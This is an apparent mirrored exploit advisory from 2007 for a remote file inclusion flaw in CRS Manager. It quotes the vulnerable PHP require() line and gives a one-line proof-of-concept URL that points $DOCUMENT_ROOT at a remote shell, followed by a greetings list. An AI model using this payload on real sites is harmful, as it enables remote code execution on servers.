CRS Manager ($DOCUMENT_ROOT) Multi Remote File Include

2007-09-1100:00:00

vulners.com

3460

JSON

#######################################
X---- w w w . u N k n 0 w n . e u ----X
#######################################

CRS Manager(crsmanager) Multi Remote File Include

::Home:
http://crsmanager.berlios.de

::Vuln Type :
Remote File Include (RFI)

::Discovered by :
iNs

::Vuln Code:
index.php
login.php

<?php
require ($DOCUMENT_ROOT."/…/admin/settings/conf.php");

PoC:
index.php?DOCUMENT_ROOT=shell??

:: iNs @ uNkn0wn.eu ::

::Gr33tz t0:
uNkn0wn.eu - iD - Stel128 - Spitfire - fEaRz - R1der - Stranger21 - nexos -
sh4m4n - Svarshik
DRT Memb3rz - s[H]4g - deL - l10m - l1l - r00tm1nd - f|_|ck3r - p1mmy
ActiveSpy - r100z - The_PitBull - MaxDeMon - SancheZ - r0x00k - str0ke

JSON

CRS Manager &#40;$DOCUMENT_ROOT&#41; Multi Remote File Include

CRS Manager ($DOCUMENT_ROOT) Multi Remote File Include